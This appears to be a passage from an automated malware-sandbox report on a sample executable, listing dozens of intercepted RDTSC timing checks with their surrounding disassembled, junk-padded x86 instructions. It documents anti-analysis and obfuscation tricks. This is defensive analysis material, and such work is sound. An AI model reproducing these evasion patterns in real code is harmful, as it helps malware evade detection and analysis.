            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57C0455 second address: 57C0459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57C0459 second address: 57C045D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57C045D second address: 57C0463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 57C0463 second address: 57C04BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548899h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF15854888Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007FF158548890h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF158548897h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830500 second address: 583051C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3908h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830B2B second address: 5830B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830B2F second address: 5830B35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830B35 second address: 5830C23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF158548890h 0x00000009 xor esi, 26760748h 0x0000000f jmp 00007FF15854888Bh 0x00000014 popfd 0x00000015 mov esi, 7DC70EBFh 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FF158548897h 0x00000025 or al, 0000003Eh 0x00000028 jmp 00007FF158548899h 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 pushad 0x00000031 call 00007FF158548897h 0x00000036 pushfd 0x00000037 jmp 00007FF158548898h 0x0000003c add eax, 33CE3198h 0x00000042 jmp 00007FF15854888Bh 0x00000047 popfd 0x00000048 pop ecx 0x00000049 pushfd 0x0000004a jmp 00007FF158548899h 0x0000004f add eax, 6956FF36h 0x00000055 jmp 00007FF158548891h 0x0000005a popfd 0x0000005b popad 0x0000005c xchg eax, ebp 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FF15854888Dh 0x00000064 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830C23 second address: 5830C48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3901h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movsx edx, si 0x0000000f popad 0x00000010 mov eax, dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830C48 second address: 5830C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830C4C second address: 5830C50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830C50 second address: 5830C56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830C56 second address: 5830C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830C5C second address: 5830C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800A6F second address: 5800AA2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3901h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF158DB3908h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800AA2 second address: 5800AB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF15854888Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800AB1 second address: 5800AB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800AB7 second address: 5800ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800ABB second address: 5800ABF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800ABF second address: 5800ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800ACE second address: 5800AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800AD2 second address: 5800AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548894h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830F66 second address: 5830FA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c pushad 0x0000000d mov al, 3Ch 0x0000000f popad 0x00000010 mov dword ptr [esp], ebp 0x00000013 jmp 00007FF158DB3902h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF158DB3907h 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5830FA6 second address: 5830FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 37h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5840B54 second address: 5840B5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5840B5A second address: 5840B5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5840B5E second address: 5840B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF158DB3905h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5840B7E second address: 5840B8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF15854888Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5840B8E second address: 5840B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5840B92 second address: 5840BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FF158548897h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov dx, si 0x00000014 pushfd 0x00000015 jmp 00007FF158548890h 0x0000001a xor esi, 0A8AB7B8h 0x00000020 jmp 00007FF15854888Bh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007FF15854888Bh 0x00000030 mov esi, 08D486DFh 0x00000035 popad 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5840BF1 second address: 5840C8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 5256h 0x00000007 mov bx, 3DE2h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 movzx ecx, bx 0x00000014 pushfd 0x00000015 jmp 00007FF158DB3901h 0x0000001a xor cx, B3B6h 0x0000001f jmp 00007FF158DB3901h 0x00000024 popfd 0x00000025 popad 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 jmp 00007FF158DB38FDh 0x0000002d mov eax, dword ptr [76FB65FCh] 0x00000032 jmp 00007FF158DB38FEh 0x00000037 test eax, eax 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c mov bx, 4E20h 0x00000040 pushfd 0x00000041 jmp 00007FF158DB3909h 0x00000046 and cx, F926h 0x0000004b jmp 00007FF158DB3901h 0x00000050 popfd 0x00000051 popad 0x00000052 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5840C8C second address: 5840CB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548891h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FF1C9C3B54Bh 0x0000000f pushad 0x00000010 jmp 00007FF15854888Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 pop edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5840CB8 second address: 5840CD7 instructions: 0x00000000 rdtsc 0x00000002 mov cx, C8D3h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ecx, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF158DB3900h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5840CD7 second address: 5840CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5840CDB second address: 5840CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5840CE1 second address: 5840D31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, al 0x00000005 jmp 00007FF158548899h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor eax, dword ptr [ebp+08h] 0x00000010 jmp 00007FF158548897h 0x00000015 and ecx, 1Fh 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007FF15854888Bh 0x00000020 pop esi 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5840D31 second address: 5840D75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3904h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b jmp 00007FF158DB3900h 0x00000010 leave 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF158DB3907h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5840D75 second address: 5840D7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5840D7B second address: 5840D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 584014F second address: 584016B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 2D30DE34h 0x00000008 mov cx, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebp+08h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, 316D45F7h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800008 second address: 580000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 580000C second address: 580001F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF15854888Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 580001F second address: 5800024 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800024 second address: 5800044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF158548893h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800044 second address: 580005C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF158DB3904h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 580005C second address: 5800060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800060 second address: 580008A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FF158DB3907h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 580008A second address: 58000A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548897h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58000A5 second address: 580011D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF158DB38FFh 0x00000009 xor ch, 0000006Eh 0x0000000c jmp 00007FF158DB3909h 0x00000011 popfd 0x00000012 call 00007FF158DB3900h 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b and esp, FFFFFFF8h 0x0000001e jmp 00007FF158DB3901h 0x00000023 xchg eax, ecx 0x00000024 jmp 00007FF158DB38FEh 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FF158DB38FEh 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 580011D second address: 580012F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF15854888Eh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 580012F second address: 580013E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 580013E second address: 5800156 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158548894h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800156 second address: 580015B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 580015B second address: 5800186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b mov bx, cx 0x0000000e mov cx, 9411h 0x00000012 popad 0x00000013 mov dword ptr [esp], ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FF158548893h 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800186 second address: 580018C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 580018C second address: 5800190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800190 second address: 5800194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800194 second address: 58001A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58001A5 second address: 58001A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58001A9 second address: 58001AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58001AF second address: 58001B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58001B5 second address: 58001B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58001B9 second address: 58001FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a call 00007FF158DB3904h 0x0000000f jmp 00007FF158DB3902h 0x00000014 pop ecx 0x00000015 push ebx 0x00000016 push ecx 0x00000017 pop ebx 0x00000018 pop esi 0x00000019 popad 0x0000001a mov dword ptr [esp], esi 0x0000001d pushad 0x0000001e mov edx, 15F6BE7Ah 0x00000023 push eax 0x00000024 push edx 0x00000025 mov bx, D734h 0x00000029 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58001FE second address: 5800265 instructions: 0x00000000 rdtsc 0x00000002 mov edx, 372F32A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov esi, dword ptr [ebp+08h] 0x0000000d pushad 0x0000000e call 00007FF158548895h 0x00000013 mov esi, 051D57E7h 0x00000018 pop eax 0x00000019 mov bl, 81h 0x0000001b popad 0x0000001c xchg eax, edi 0x0000001d jmp 00007FF158548894h 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FF15854888Ch 0x0000002c add eax, 1B2ADA78h 0x00000032 jmp 00007FF15854888Bh 0x00000037 popfd 0x00000038 mov ah, CDh 0x0000003a popad 0x0000003b rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800265 second address: 58002B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3902h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF158DB38FDh 0x00000013 or ah, FFFFFFC6h 0x00000016 jmp 00007FF158DB3901h 0x0000001b popfd 0x0000001c jmp 00007FF158DB3900h 0x00000021 popad 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58002B3 second address: 580031B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF158548891h 0x00000009 add ah, FFFFFFD6h 0x0000000c jmp 00007FF158548891h 0x00000011 popfd 0x00000012 mov edx, esi 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test esi, esi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FF15854888Fh 0x00000022 xor eax, 45FC070Eh 0x00000028 jmp 00007FF158548899h 0x0000002d popfd 0x0000002e movzx ecx, di 0x00000031 popad 0x00000032 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 580031B second address: 5800335 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB38FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FF1CA4E1BE2h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5800335 second address: 580033B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 580033B second address: 580039E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3904h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007FF158DB3900h 0x00000015 je 00007FF1CA4E1BB7h 0x0000001b jmp 00007FF158DB3900h 0x00000020 mov edx, dword ptr [esi+44h] 0x00000023 jmp 00007FF158DB3900h 0x00000028 or edx, dword ptr [ebp+0Ch] 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov bl, F3h 0x00000030 mov bh, al 0x00000032 popad 0x00000033 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 580039E second address: 58003E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF15854888Eh 0x00000008 mov esi, 0173D731h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test edx, 61000000h 0x00000016 pushad 0x00000017 mov ax, 3B69h 0x0000001b push eax 0x0000001c mov ch, bh 0x0000001e pop esi 0x0000001f popad 0x00000020 jne 00007FF1C9C76B47h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF158548898h 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 58003E7 second address: 5800422 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB38FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test byte ptr [esi+48h], 00000001h 0x0000000d pushad 0x0000000e call 00007FF158DB3904h 0x00000013 mov ebx, eax 0x00000015 pop esi 0x00000016 push eax 0x00000017 push edx 0x00000018 call 00007FF158DB38FDh 0x0000001d pop esi 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5810113 second address: 5810134 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6B144C7Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF158548893h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5810134 second address: 5810167 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF158DB3909h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FF158DB38FEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5810167 second address: 581016B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 581016B second address: 581016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 581016F second address: 5810175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 5810175 second address: 581017B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LisectAVT_2403002A_140.exeRDTSC instruction interceptor: First address: 581017B second address: 581017F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
